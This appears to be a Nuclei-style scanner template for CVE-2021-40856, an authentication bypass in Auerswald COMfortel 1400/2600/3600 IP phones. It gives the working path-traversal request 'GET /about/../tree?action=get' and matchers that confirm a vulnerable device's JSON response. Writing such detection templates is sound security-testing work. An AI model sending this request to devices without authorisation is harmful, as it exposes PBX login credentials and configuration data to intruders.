id: CVE-2021-40856 info: name: Auerswald COMfortel 1400/2600/3600 IP - Authentication Bypass author: gy741 severity: medium description: Inserting the prefix "/about/../" allows bypassing the authentication check for the web-based configuration management interface. This enables attackers to gain access to the login credentials used for authentication at the PBX, among other data. reference: - https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-004/-auerswald-comfortel-1400-2600-3600-ip-authentication-bypass - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40856 tags: cve,cve2021,comfortel,auth-bypass requests: - raw: - | GET /about/../tree?action=get HTTP/1.1 Host: {{Hostname}} Accept: */* matchers-condition: and matchers: - type: word part: body words: - '"TYPE"' - '"ITEMS"' - '"COUNT"' condition: and - type: word part: header words: - application/json - type: status status: - 200